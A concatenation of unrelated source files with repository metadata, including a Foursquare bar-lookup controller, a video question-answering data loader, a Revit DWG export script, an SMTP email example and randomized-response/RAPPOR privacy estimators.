'public': True,
'hide_untranslated': False,
'redirect_on_fallback': True,
},
1: [
{
'public': True,
'code': 'de',
'hide_untranslated': False,
'name': gettext('de'),
'redirect_on_fallback': True,
},
],
}
CMS_TEMPLATES = (
## Customize this
('fullwidth.html', 'Fullwidth'),
('sidebar_left.html', 'Sidebar Left'),
('sidebar_right.html', 'Sidebar Right')
)
CMS_PERMISSION = True
CMS_PLACEHOLDER_CONF = {}
DATABASES = {
'default': {
'CONN_MAX_AGE': 0,
'ENGINE': 'django.db.backends.sqlite3',
'HOST': 'localhost',
'NAME': 'project.db',
'PASSWORD': '',
'PORT': '',
'USER': ''
}
}
MIGRATION_MODULES = {
}
THUMBNAIL_PROCESSORS = (
'easy_thumbnails.processors.colorspace',
'easy_thumbnails.processors.autocrop',
'filer.thumbnail_processors.scale_and_crop_with_subject_location',
'easy_thumbnails.processors.filters'
)
|
[
"o.sahin@oesah.de"
] |
o.sahin@oesah.de
|
65ebfe4663a3341f1b8068cfbc4828dcf225ac50
|
e8c65be05e771c74d6d389b9d2123aacbdb5cdbe
|
/clover/controller/bars_controller.py
|
a9f06777a8c647acfdf53d86b18c392f35873f7d
|
[] |
no_license
|
reDim89/cloverAPI
|
c79996db332a546f173102b52f24f969a196af8c
|
d249caae93f7e9c01160e2357a9b6cfbed51421b
|
refs/heads/master
| 2022-12-16T19:27:01.705760
| 2019-01-01T07:41:37
| 2019-01-01T07:41:37
| 140,020,086
| 0
| 0
| null | 2022-12-08T01:16:41
| 2018-07-06T18:53:07
|
Python
|
UTF-8
|
Python
| false
| false
| 4,185
|
py
|
import requests
import configparser
import json
from collections import OrderedDict
config = configparser.ConfigParser()
config.read('settings.ini')
class Bars_controller:
def __init__(self):
self._client_id = config['FOURSQUARE']['CLIENT_ID']
self._client_secret = config['FOURSQUARE']['CLIENT_SECRET']
self._section = 'drinks'
self._base_url = 'https://api.foursquare.com/v2/venues/'
self._version = '20181103'
def _get_bars(self, limit, ll):
payload = {'client_id': self._client_id,
'client_secret': self._client_secret,
'v': self._version,
'll': str(ll),
'section': self._section,
'limit': limit
}
self._response = requests.get(self._base_url + 'explore',
params=payload)
return self._response.status_code
def _extract_bars_list(self, limit, ll):
self._get_bars(limit, ll)
try:
items_list = [item for item in self._response.json()
['response']
['groups']
[0]
['items']]
except KeyError:
            print('Items are missing in API response')
return None
return items_list
def get_venues(self, limit, ll):
venues_list = []
try:
items_list = self._extract_bars_list(limit, ll)
except RuntimeError:
return None
for item in items_list:
try:
d = {'id': item['venue']['id'],
'name': item['venue']['name'],
'address': item['venue']['location']['address'],
'lat': item['venue']['location']['lat'],
'lng': item['venue']['location']['lng']}
except KeyError:
d = {'id': item['venue']['id'],
'name': item['venue']['name'],
'lat': item['venue']['location']['lat'],
'lng': item['venue']['location']['lng']}
venues_list.append(OrderedDict(sorted(d.items())))
return json.dumps(venues_list, ensure_ascii=False)
def get_venue_details(self, id):
payload = {'client_id': self._client_id,
'client_secret': self._client_secret,
'v': self._version,
}
        # Query FourSquare by venue id
self._response = requests.get(self._base_url + id,
params=payload).json()['response']
venue_name = self._response['venue']['name']
        # Handle the case where there is no photo
try:
photo_url = (self._response['venue']['bestPhoto']['prefix'] +
str(self._response['venue']['bestPhoto']['width']) + 'x' +
str(self._response['venue']['bestPhoto']['height']) +
self._response['venue']['bestPhoto']['suffix'])
except KeyError:
photo_url = 'No photo'
print('No photo for venue {0}'.format(venue_name))
        # Handle the case where there is no description
try:
venue_description = self._response['venue']['description']
except KeyError:
venue_description = 'No description'
            print('No description for venue {0}'.format(venue_name))
        # Handle the case where there is no URL
try:
venue_url = self._response['venue']['url']
except KeyError:
venue_url = 'No url'
print('No url for venue {0}'.format(venue_name))
venue_details = {'name': venue_name,
'description': venue_description,
'price': self._response['venue']['price']['tier'],
'photo': photo_url,
'url': venue_url
}
return json.dumps(venue_details, ensure_ascii=False)
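# A hedged usage sketch: it assumes a settings.ini with a [FOURSQUARE] section
# providing CLIENT_ID and CLIENT_SECRET, plus network access; the coordinates
# passed below are arbitrary.
if __name__ == '__main__':
    controller = Bars_controller()
    print(controller.get_venues(limit=5, ll='55.7558,37.6173'))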
|
[
"idmitat@gmail.com"
] |
idmitat@gmail.com
|
285b24a7eacfde3a0bff5e3f723f6864861e9aec
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02409/s375215076.py
|
48a6cc040f6684de780dec7af370123b59d63a1f
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 501
|
py
|
import sys
official_house = {}
for b in range(1, 5):
for f in range(1, 4):
for r in range(1, 11):
official_house[(b, f, r)] = 0
n = int(sys.stdin.readline())
for line in sys.stdin:
(b, f, r, v) = [int(i) for i in line.split()]
official_house[(b, f, r)] += v
for b in range(1, 5):
if b != 1:
print("####################")
for f in range(1, 4):
for r in range(1, 11):
print(" %d" % official_house[(b, f, r)], end="")
print()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
187944515c8e933e6c9211a36f745186a56063bd
|
883f666c6a8afa30fd094b7054039c57755867c3
|
/slowfast/TrainSet.py
|
fb161c75adfce5fa925b0a5ce80a9b8d5ceb86fd
|
[] |
no_license
|
Yahiy/video_question_answer
|
ea59dc3eef9004012008054dd170c528740714bb
|
491ed94e63a059183c0cb8e03e35be763cf4eceb
|
refs/heads/master
| 2020-04-14T15:42:13.653835
| 2019-06-11T09:13:37
| 2019-06-11T09:13:37
| 163,935,142
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,677
|
py
|
from __future__ import absolute_import
import os
import numpy as np
import re
import h5py
from PIL import Image
import torch
from torchvision.transforms import transforms
from scribt.data_util import pad_video, pad_sequences
class TrainSet(object):
def __init__(self, dataset, hdf5_path, word_matrix, word2idx, ans2idx):
#, questions, word_embed,labels,root=None, transform=None):
super(TrainSet, self).__init__()
self.dataset = dataset
self.feat_h5 = h5py.File(hdf5_path, 'r')
self.image_feature_net = 'resnet'
self.layer = 'pool5'
self.word_matrix = word_matrix
self.word2idx = word2idx
self.ans2idx = ans2idx
self.transform = transforms.Compose([transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
def __len__(self):
return len(self.dataset)
def __getitem__(self, indices):
if isinstance(indices, (tuple, list)):
data_list = []
for index in indices:
data_list.extend(self.get_single_item(index))
return data_list
return self.get_single_item(indices)
def get_single_item(self, index):
text_data = self.dataset[index]
img_path, question, answer, type, video_id, caption, _ = text_data
# video_feature = self.load_video_feature(video_id)
# video_feature = pad_video(video_feature, [35,2048])
imgs = self.load_imgs(img_path)
question_embed, ql = self.convert_sentence_to_matrix(question)
label = self.ans2idx[answer]
return imgs, question_embed, ql, label, type
def load_video_feature(self, video_id):
if self.image_feature_net == 'resnet':
assert self.layer.lower() in ['pool5', 'res5c']
video_feature = np.array(self.feat_h5[str(video_id)])
return video_feature
# if self.layer.lower() == 'res5c':
# video_feature = np.transpose(
# video_feature.reshape([-1, 2048, 7, 7]), [0, 2, 3, 1])
# assert list(video_feature.shape[1:]) == [7, 7, 2048]
# elif self.layer.lower() == 'pool5':
# video_feature = np.expand_dims(video_feature, axis=1)
# video_feature = np.expand_dims(video_feature, axis=1)
# assert list(video_feature.shape[1:]) == [1, 1, 2048]
# elif self.image_feature_net.lower() == 'c3d':
# assert self.layer.lower() in ['fc6', 'conv5b']
# video_feature = np.array(self.feat_h5[video_id])
#
# if self.layer.lower() == 'fc6':
# if len(video_feature.shape) == 1:
# video_feature = np.expand_dims(video_feature, axis=0)
# video_feature = np.expand_dims(video_feature, axis=1)
# video_feature = np.expand_dims(video_feature, axis=1)
# assert list(video_feature.shape[1:]) == [1, 1, 4096]
# elif self.layer.lower() == 'conv5b':
# if len(video_feature.shape) == 4:
# video_feature = np.expand_dims(video_feature, axis=0)
# video_feature = np.transpose(
# video_feature.reshape([-1, 1024, 7, 7]), [0, 2, 3, 1])
# assert list(video_feature.shape[1:]) == [7, 7, 1024]
#
# elif self.image_feature_net.lower() == 'concat':
# assert self.layer.lower() in ['fc', 'conv']
# c3d_feature = np.array(self.feat_h5["c3d"][video_id])
# resnet_feature = np.array(self.feat_h5["resnet"][video_id])
# if len(c3d_feature.shape) == 1:
# c3d_feature = np.expand_dims(c3d_feature, axis=0)
# # if len(resnet_feature.shape) == 1:
# # resnet_feature = np.expand_dims(resnet_feature, axis=0)
#
# if not len(c3d_feature) == len(resnet_feature):
# max_len = min(len(c3d_feature), len(resnet_feature))
# c3d_feature = c3d_feature[:max_len]
# resnet_feature = resnet_feature[:max_len]
#
# if self.layer.lower() == 'fc':
# video_feature = np.concatenate((c3d_feature, resnet_feature),
# axis=len(c3d_feature.shape) - 1)
# video_feature = np.expand_dims(video_feature, axis=1)
# video_feature = np.expand_dims(video_feature, axis=1)
# assert list(video_feature.shape[1:]) == [1, 1, 4096 + 2048]
# elif self.layer.lower() == 'conv':
# c3d_feature = np.transpose(c3d_feature.reshape([-1, 1024, 7, 7]), [0, 2, 3, 1])
# resnet_feature = np.transpose(resnet_feature.reshape([-1, 2048, 7, 7]), [0, 2, 3, 1])
# video_feature = np.concatenate((c3d_feature, resnet_feature),
# axis=len(c3d_feature.shape) - 1)
# assert list(video_feature.shape[1:]) == [7, 7, 1024 + 2048]
# return video_feature
def load_imgs(self, img_path):
img_root = '/home/yuan/project/tgif-qa/code/dataset/tgif/frames'
path = os.path.join(img_root, img_path) + '.gi'
img_list = os.listdir(path)
img_list = sorted(img_list, key=lambda x:int(x.split('.')[0]))
img_list = self.pad_imgs(img_list=img_list)
imgs = []
for i in img_list:
ip = os.path.join(path, i)
img = Image.open(ip).convert('RGB')
img = self.transform(img)
imgs.append(img)
imgs = torch.stack(imgs, 1)
return imgs
def pad_imgs(self, img_list, max_length=64):
'''
        Resample img_list to a fixed number of frames (max_length)
        by uniform index sampling.
'''
length = len(img_list)
num_padding = length - max_length
if num_padding == 0:
padded_imgs = img_list
else:
steps = np.linspace(0, length, num=max_length, endpoint=False, dtype=np.int32)
img_list = np.array(img_list)
padded_imgs = list(img_list[steps])
return padded_imgs
def convert_sentence_to_matrix(self, sentence):
words = re.split('[ \'-,]', sentence.strip('\ \?\.\n'))
words_pad = pad_sequences(words, max_length=16)
sent2indices = [self.word2idx[w] if w in self.word2idx else 2 for w in words_pad]
word_embeds = [np.float32(self.word_matrix[x-2]) for x in sent2indices]
return word_embeds, len(words)
|
[
"yuanhuan9412@163.com"
] |
yuanhuan9412@163.com
|
507a3b401ef53bd3971001e9e1d39b9d98b2a3e4
|
4873d24dd9e93ed28a282539b5d8e06e4991adb0
|
/BikeAndBim.extension/BikeAnd.tab/View.panel/Export_cad.pushbutton/script.py
|
5976b82050953ed7d83139531954004833f24b8f
|
[
"MIT"
] |
permissive
|
appolimp/Revit_extensions_pyRevit
|
71e1c4c33fad5f71636dc72afd196f7607f66ef9
|
1790b18c12e8bc603a6a726b2733678494180986
|
refs/heads/main
| 2023-07-02T06:32:05.191637
| 2021-08-09T09:06:13
| 2021-08-09T09:06:13
| 307,311,747
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,256
|
py
|
# coding=utf-8
from rpw import db, DB, UI, uidoc, doc, logger
from pyrevit import forms
from System.Collections.Generic import List
import os.path
class ElemNotFound(Exception):
pass
VALID_VIEW_TYPE = [DB.ViewType.FloorPlan,
DB.ViewType.CeilingPlan,
DB.ViewType.Elevation,
DB.ViewType.ThreeD,
DB.ViewType.DrawingSheet,
DB.ViewType.DraftingView,
DB.ViewType.EngineeringPlan,
DB.ViewType.Section,
DB.ViewType.Detail,
]
STANDARD_PREFIX = 'Enter your prefix or ~ for ignore'
DWG_OPTION_NAME = 'RC Layers Standard VBP'
@db.Transaction.ensure('Edit crop view')
def main():
is_config = not __shiftclick__
dwg_option_name = get_dwg_option_name(is_config)
result, folder = export_dwg(dwg_option_name, STANDARD_PREFIX)
task_dialog('info',
'Export {} files to <{}>\nExport option is "{}"'.format(len(result), folder, dwg_option_name),
data=sorted(result))
def get_dwg_option_name(is_config=True):
if is_config:
name_option = get_name_option_from_config_or_none()
if name_option and is_valid_export_option(name_option):
return name_option
name_option = get_option_name_from_user()
set_option_to_config(name_option)
logger.debug('DWG option: "{}"'.format(name_option))
return name_option
def get_name_option_from_config_or_none():
try:
cfg = get_config()
if cfg.has_section('Setup_names'):
section = cfg.get_section('Setup_names')
file_name = get_file_name_for_config()
if section.has_option(file_name):
name_from_config = section.get_option(file_name)
logger.debug('Get Option name from config: "{}"'.format(name_from_config))
return name_from_config
except Exception:
logger.error('Get error from export config')
def get_file_name_for_config():
if doc.IsWorkshared:
path = DB.BasicFileInfo.Extract(doc.PathName).CentralPath
else:
path = doc.PathName
file_name = os.path.split(path)[-1]
logger.debug('Get file name: {}'.format(file_name))
return file_name
def set_option_to_config(name_option):
try:
cfg = get_config()
if not cfg.has_section('Setup_names'):
cfg.add_section('Setup_names')
section = cfg.get_section('Setup_names')
file_name = get_file_name_for_config()
section.set_option(file_name, name_option)
cfg.save_changes()
logger.debug('Set Option name "{}" from file: "{}"'.format(name_option, file_name))
except Exception:
logger.error('Get error from export config')
def get_config():
from pyrevit.userconfig import PyRevitConfig
import os
this_folder = os.path.dirname(os.path.abspath(__file__))
init_file = os.path.join(this_folder, 'config.ini')
cfg = PyRevitConfig(init_file)
return cfg
def get_option_name_from_user():
setup_names = DB.BaseExportOptions.GetPredefinedSetupNames(doc)
res = forms.SelectFromList.show(setup_names,
title='Predefined setup Names for export',
width=300,
height=300,
button_name='Select option for export')
logger.debug('Get name from user "{}"'.format(res))
return res
def export_dwg(dwg_option_name, standard_prefix):
result = []
views_id = get_selected_views_id()
dwg_option = get_dwg_option(dwg_option_name)
path_with_name = get_path(standard_prefix)
folder, prefix = get_folder_and_prefix_by_path(path_with_name, standard_prefix)
for view_id in views_id:
name = prefix + get_name_view_by_id(view_id)
col = List[DB.ElementId]([view_id])
doc.Export(folder, name, col, dwg_option)
delete_pcp_file(folder, name)
result.append(name)
logger.debug('View #{}. Export with name "{}"'.format(view_id, name))
logger.info('Export {} files for folder: <{}>'.format(len(views_id), folder))
return result, folder
def delete_pcp_file(folder, name):
path = os.path.join(folder, name + '.pcp')
if os.path.isfile(path):
try:
os.remove(path)
logger.debug('Delete .pcp file by path <{}>'.format(path))
except Exception:
pass
def get_selected_views_id():
pre_selected = uidoc.Selection.GetElementIds()
selected_views_id = List[DB.ElementId]()
for elem_id in pre_selected:
elem = doc.GetElement(elem_id)
if elem and isinstance(elem, DB.View) and elem.ViewType in VALID_VIEW_TYPE:
selected_views_id.Add(elem_id)
if selected_views_id:
logger.debug('User select {} views'.format(len(selected_views_id)))
return selected_views_id
if doc.ActiveView.ViewType in VALID_VIEW_TYPE:
logger.debug('Not found any valid selected view. So return ActiveView id')
return List[DB.ElementId]([doc.ActiveView.Id])
raise ElemNotFound('Valid selected view and ActiveView not found. ActiveView.ViewType is "{}"'.format(
doc.ActiveView.ViewType))
def get_name_view_by_id(view_id):
view = doc.GetElement(view_id)
if view:
return make_valid_name(view.Title)
raise ElemNotFound('View #{}. Not found in document'.format(view_id))
def make_valid_name(name):
import string
NON_VALID_CHARACTERS = ['\\', '/', ':', '*', '?', '"', '<', '>', '|']
valid_name = ''.join(ch if ch not in NON_VALID_CHARACTERS else ' ' for ch in name)
logger.debug('Name {}. Make valid -> {}'.format(name, valid_name))
return valid_name
def get_path(prefix):
    window = UI.FileSaveDialog("AutoCAD 2013 DWG Files (*.dwg)|*.dwg")
window.InitialFileName = prefix
    window.Title = 'Choose folder and enter your prefix or ~ for ignore'
window.Show()
path = window.GetSelectedModelPath()
if path:
string_path = DB.ModelPathUtils.ConvertModelPathToUserVisiblePath(path)
logger.debug('Get path from user: <{}>'.format(string_path))
return string_path
    raise ElemNotFound('Cannot get path from user')
def get_folder_and_prefix_by_path(path, standard_prefix):
folder, name = os.path.split(path)
prefix, ext = os.path.splitext(name)
if prefix in [standard_prefix, '~']:
prefix = ''
else:
logger.info('Get prefix: "{}"'.format(prefix))
logger.info('Get folder <{}>'.format(folder))
return folder, prefix
def get_dwg_option(option_name):
if is_valid_export_option(option_name):
dwg_option = DB.DWGExportOptions.GetPredefinedOptions(doc, option_name)
dwg_option.FileVersion = DB.ACADVersion.R2013
logger.debug('Option name is valid: "{}"'.format(option_name))
return dwg_option
raise ElemNotFound('Setup name for export not found with name "{}"'.format(option_name))
def is_valid_export_option(option_name):
setup_names = DB.BaseExportOptions.GetPredefinedSetupNames(doc)
return option_name in setup_names
def task_dialog(type_mes, msg, data=None):
"""
For create task dialog with error and message
:param type_mes: info or error
:type type_mes: str
:param msg: Message for window
:type msg: str
:param data: Text for expanded content
:type data: []
"""
window = UI.TaskDialog('Export CAD')
window.TitleAutoPrefix = False
if type_mes == 'info':
window.MainIcon = UI.TaskDialogIcon.TaskDialogIconInformation
window.MainInstruction = 'Info'
window.MainContent = msg
else:
window.MainIcon = UI.TaskDialogIcon.TaskDialogIconError
window.MainInstruction = 'Error'
window.MainContent = msg
if data:
window.ExpandedContent = '\n'.join(data)
window.CommonButtons = UI.TaskDialogCommonButtons.Ok
window.Show()
if __name__ == '__main__':
logger.setLevel(60)
try:
main()
except Exception as err:
raise
# task_dialog(type_mes='error', msg='Please, write Nikita', data=err.args)
|
[
"65594849+appolimp@users.noreply.github.com"
] |
65594849+appolimp@users.noreply.github.com
|
4192c5574c63d75afb5a68bf33c50f46e23697d0
|
4bb665407ec8c323de16ad8c033fba7769b472b7
|
/InputScript.py
|
fee163c779dfd4f896ca0d225c5bbd7884dc0152
|
[] |
no_license
|
MNienaber2727/CS237_caching_pubsub
|
45de2a37f0afe7369ea92330df5ff65705224af1
|
8459b6bb1dc4406eb0d0d652568374f577e26f9a
|
refs/heads/main
| 2023-05-23T09:32:45.210535
| 2021-06-11T20:12:50
| 2021-06-11T20:12:50
| 370,917,885
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 676
|
py
|
import csv
from random import seed
from random import randint
import sys
size = int(sys.argv[1])
pubID = [0]*size
restaurant = [0]*size
food_item = [0]*size
discount = [0]*size
val = [0]*size
validSubs = []
validSubs.append("10001")
validSubs.append("00110")
#validSubs.append("11000")
#print(data)
for j in range(1,4):
seed(randint(0,1000))
data = [0]*size
for i in range(size):
pubID[i] = randint(0,1)
val[i] = validSubs[randint(0,1)]
data[i]=[pubID[i],val[i]]
file="/home/mason/Documents/CS237_caching_pubsub/test{benchmark}_{tmp}.csv".format(benchmark=size,tmp=j)
with open(file, 'w') as f:
writer = csv.writer(f)
writer.writerows(data)
|
[
"MNienaber27@hotmail.com"
] |
MNienaber27@hotmail.com
|
78f2c8d2d7c3d68984934ce71f7e03a5b5f88a88
|
b424a13f032d5a607e6df4dd78bc47ad1d06a147
|
/scipy/sparse/linalg/tests/test_onenormest.py
|
7916996b7bcd8d29065abed19a128c453bb04c5b
|
[] |
no_license
|
EnjoyLifeFund/macSierra-py36-pkgs
|
1e7eeb9b55415da6eb12465d67730d76e9cc619a
|
0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2
|
refs/heads/master
| 2021-01-20T10:23:50.044019
| 2017-09-05T02:53:26
| 2017-09-05T02:53:26
| 90,333,987
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 115
|
py
|
../../../../../../../Cellar/scipy/0.19.1_1/lib/python3.6/site-packages/scipy/sparse/linalg/tests/test_onenormest.py
|
[
"raliclo@gmail.com"
] |
raliclo@gmail.com
|
9247d33df0eac0e28bd18e72ec4448cf71df1f1e
|
285a12ef65663e16d9237bd9991d2d0f2eea7363
|
/Itertools/Itertools-Product.py
|
3fada69cfad2f5100d55935fe93324a68c6cdc13
|
[] |
no_license
|
ZhiquanW/Learning-Python-HackerRank
|
18d7eaee624ae46d48cdce5a25334a5f44715156
|
4ccb8364b684c028720f146caa8f2883a0a91ca0
|
refs/heads/master
| 2021-08-31T19:28:01.134210
| 2017-12-22T14:41:44
| 2017-12-22T14:41:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 103
|
py
|
import itertools
a,b = map(int,input().split()),map(int,input().split())
print(*itertools.product(a,b))
|
[
"mysabrehawk@outlook.com"
] |
mysabrehawk@outlook.com
|
37bcd938bdd77011bda3d17d3f856bd3ffd513e6
|
8edd63a42469bf09fcad1c1070995ceda6e49646
|
/env/lib/python2.7/site-packages/observations/r/delivery.py
|
dca99a0329f9cacbcf4199fbe48dd16f61895323
|
[] |
no_license
|
silky/bell-ppls
|
fa0b5418f40dab59de48b7220ff30caba5945b56
|
369e7602c810b694a70ac1e875017480c8910ac8
|
refs/heads/master
| 2020-04-06T08:40:28.588492
| 2018-11-01T06:51:33
| 2018-11-01T06:51:33
| 157,312,221
| 1
| 0
| null | 2018-11-13T03:04:18
| 2018-11-13T03:04:18
| null |
UTF-8
|
Python
| false
| false
| 1,589
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def delivery(path):
"""Delivery Time Data
Delivery Time Data, from Montgomery and Peck (1982). The aim is to
explain the time required to service a vending machine (Y) by means of
the number of products stocked (X1) and the distance walked by the route
driver (X2).
A data frame with 25 observations on the following 3 variables.
`n.prod`
Number of Products
`distance`
Distance
`delTime`
Delivery time
Montgomery and Peck (1982, p.116)
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `delivery.csv`.
Returns:
Tuple of np.ndarray `x_train` with 25 rows and 3 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'delivery.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/robustbase/delivery.csv'
maybe_download_and_extract(path, url,
save_file_name='delivery.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
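# A minimal usage sketch; the cache directory '~/observations-data' is an
# arbitrary choice, and the first call needs network access to download the CSV.
if __name__ == '__main__':
  x_train, metadata = delivery('~/observations-data')
  print(x_train.shape)          # (25, 3) per the docstring above
  print(metadata['columns'])    # n.prod, distance, delTime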
|
[
"akobeid.1@gmail.com"
] |
akobeid.1@gmail.com
|
8d05cd1d030aee3c13850f7a8918a4ff76bb2f25
|
48af880c1aa54c6986c218a231bd9eb97c5bee34
|
/email_example3.py
|
37965c59f0fc5f51cad69a35b5609c8193af49e3
|
[] |
no_license
|
vcazcarra/raspberry_pi
|
e91f32ae676e51c02576f5a2637fc91751b01718
|
a322ac74c6ee3628955bfcb07afc9e4a11c744cd
|
refs/heads/master
| 2023-07-09T06:23:49.212119
| 2021-08-12T08:53:15
| 2021-08-12T08:53:15
| 395,252,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 431
|
py
|
import smtplib, ssl
port = 465 # For SSL
smtp_server = "smtp.gmail.com"
sender_email = "---------"
receiver_email = "--------"
password = "---------"
message = """\
Subject: Hi there
This message is sent from Python."""
context = ssl.create_default_context()
with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, message)
|
[
"noreply@github.com"
] |
vcazcarra.noreply@github.com
|
2866fd7b0bed2c7dcb21ed78c1b95aab2ebfc698
|
43374a7e2cc5dcb634211e5380ff2b4e3ff7d7d7
|
/RR_RAPPOR.py
|
717f1dabe73fd6d2bbd3a6e66735e09e52bf79c5
|
[] |
no_license
|
WeiNingChen/RHR
|
395818fc3033de2a9937c29193b2e3e7b595d64e
|
d623e672881b823fc6ad33ceb7fbe03ba18ad756
|
refs/heads/master
| 2022-10-07T03:27:35.988875
| 2020-06-10T23:23:30
| 2020-06-10T23:23:30
| 271,405,761
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,433
|
py
|
#%matplotlib inline
import numpy as np
import random
import math
import matplotlib.pyplot as plt
import timeit
from functions import *
#The class for Randomized Response:
class Randomized_Response:
def __init__(self, absz, pri_para): # absz: alphabet size, pri_para: privacy parameter
self.absz = absz #alphabet size k
self.exp = math.exp(pri_para) #privacy parameter
self.flip_prob = (self.absz - 1)/(math.exp(pri_para) + self.absz - 1) #flipping probability to maintain local privacy
#print("Private parameter:")
#print(pri_para)
#print("Crossover prob:")
#print(self.flip_prob)
def encode_string(self, samples):
n = len(samples)
# Start by setting private_samples = samples.
private_samples_rr = np.copy(samples)
# Determine which samples need to be noised ("flipped").
flip = np.random.random_sample(n) < self.flip_prob
flip_samples = samples[flip]
# Select new samples uniformly at random to replace the original ones.
rand_samples = np.random.randint(0, self.absz - 1, len(flip_samples))
        # Shift the samples if needed to avoid sampling the original samples.
rand_samples[rand_samples >= flip_samples] += 1
# Replace the original samples by the randomly selected ones.
private_samples_rr[flip] = rand_samples
return private_samples_rr
def decode_string(self, out_samples, normalization = 0):
        # normalization options: 0: clip and normalize (default)
        #                        1: simplex projection
        #                        else: no normalization
n = len(out_samples)
(counts_rr,temp) = np.histogram(out_samples, range(self.absz+1))
# Estimate the PMF using the count vector.
p_rr = (counts_rr / float(n)) * ((self.exp + self.absz - 1) /(self.exp - 1)) - 1.0 / (self.exp - 1)
#p_rr = decode_counts(counts_rr, epsilon, n, self.absz)
# Check if truncation and renormalization is required.
if normalization == 0:
p_rr = probability_normalize(p_rr) #clip and normalize
if normalization == 1:
p_rr = project_probability_simplex(p_rr) #simplex projection
return p_rr
class RAPPOR:
def __init__(self, absz, pri_para): # absz: alphabet size, pri_para: privacy parameter
self.absz = absz #alphabet size k
self.exp = math.exp(pri_para / 2.0) #privacy parameter
self.flip_prob = 1/(math.exp(pri_para/2.0) + 1) #flipping probability to maintain local privacy
def encode_string(self, samples):
n = len(samples)
users = range(n)
# One-hot encode the input integers.
private_samples_rappor = np.zeros((n, self.absz))
private_samples_rappor[users, samples] = 1
# Flip the RAPPOR encoded bits with probability self.flip_prob
flip = np.random.random_sample((n, self.absz))
return np.logical_xor(private_samples_rappor, flip < self.flip_prob)
def encode_string_light(self, samples):
        # return the count vector of the RAPPOR response, which is less memory intensive
        # also return the cumulative time spent adding RAPPOR vectors, which should be counted as decoding time
n = len(samples)
users = range(n)
time = 0
counts = np.zeros(self.absz)
# One-hot encode the input integers.
for i in range(n):
private_samples_rappor = np.zeros(self.absz)
private_samples_rappor[samples[i]] = 1
# Flip the RAPPOR encoded bits with probability self.flip_prob
flip = np.random.random_sample(self.absz)
private_samples_rappor = np.logical_xor(private_samples_rappor, flip < self.flip_prob)
start_time = timeit.default_timer() #record adding time
            counts = counts + private_samples_rappor # add rappor response vector
time = time + timeit.default_timer() - start_time
return counts,time
def encode_string_compress(self, samples):
        # encode rappor responses into the locations of ones, which saves communication budget when eps is large
n = len(samples)
out = [0]*n
# One-hot encode the input integers.
for i in range(n):
private_samples_rappor = np.zeros(self.absz)
private_samples_rappor[samples[i]] = 1
# Flip the RAPPOR encoded bits with probability self.flip_prob
flip = np.random.random_sample(self.absz)
private_samples_rappor = np.logical_xor(private_samples_rappor, flip < self.flip_prob)
out[i] = np.where(private_samples_rappor)[0] # get the locations of ones
out_list = np.concatenate(out)
return out_list
def decode_counts(self, counts, n, normalization = 0):
        # normalization options: 0: clip and normalize (default)
        #                        1: simplex projection
        #                        else: no normalization
# Estimate the PMF using the count vector
p_rappor = (counts / float(n)) * ((self.exp + 1) /(self.exp - 1)) - 1.0 / (self.exp - 1)
if normalization == 0:
p_rappor = probability_normalize(p_rappor) #clip and normalize
if normalization == 1:
p_rappor = project_probability_simplex(p_rappor) #simplex projection
return p_rappor
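# A small round-trip sketch for the Randomized_Response mechanism defined above:
# draw i.i.d. samples, privatize them, and recover a PMF estimate. It relies on
# probability_normalize coming from the `functions` import at the top; the
# alphabet size, epsilon and sample count below are arbitrary.
if __name__ == '__main__':
    k, eps, n = 4, 1.0, 100000
    true_p = np.array([0.4, 0.3, 0.2, 0.1])
    samples = np.random.choice(k, size=n, p=true_p)
    rr = Randomized_Response(k, eps)
    privatized = rr.encode_string(samples)
    p_hat = rr.decode_string(privatized)   # clipped-and-normalized estimate
    print(np.round(p_hat, 3))              # approaches true_p as n grows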
|
[
"wnchen1994@gmail.com"
] |
wnchen1994@gmail.com
|
5f9036702734ca973c14594d1a5935aad7513076
|
e9f775a0fd9390f586968967a773e9d28839024c
|
/paper/scripts/qaoa_treewidth_times.py
|
417e3728e138f7964791aa73ec1b8c7736edb2bf
|
[
"BSD-3-Clause"
] |
permissive
|
gharib85/ConSequences
|
da61ea6ac4530215ef96a52165d8a6dff0298d89
|
acf9dcfd931137cbca71251cd0c09c5009aee99d
|
refs/heads/master
| 2021-02-12T04:28:36.964069
| 2018-11-17T22:28:35
| 2018-11-17T22:28:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,186
|
py
|
#!/usr/bin/env python3
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
import numpy as np
import sys
import warnings
from macros import colors
def algorithm_font(algorithm):
return r'\textsf{{{}}}'.format(algorithm)
def plot_treewidth_time_comparison(data_filename, plot_filename, verbose):
# Use latex font
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# sns.set_context("paper", rc={"font.size": 80,
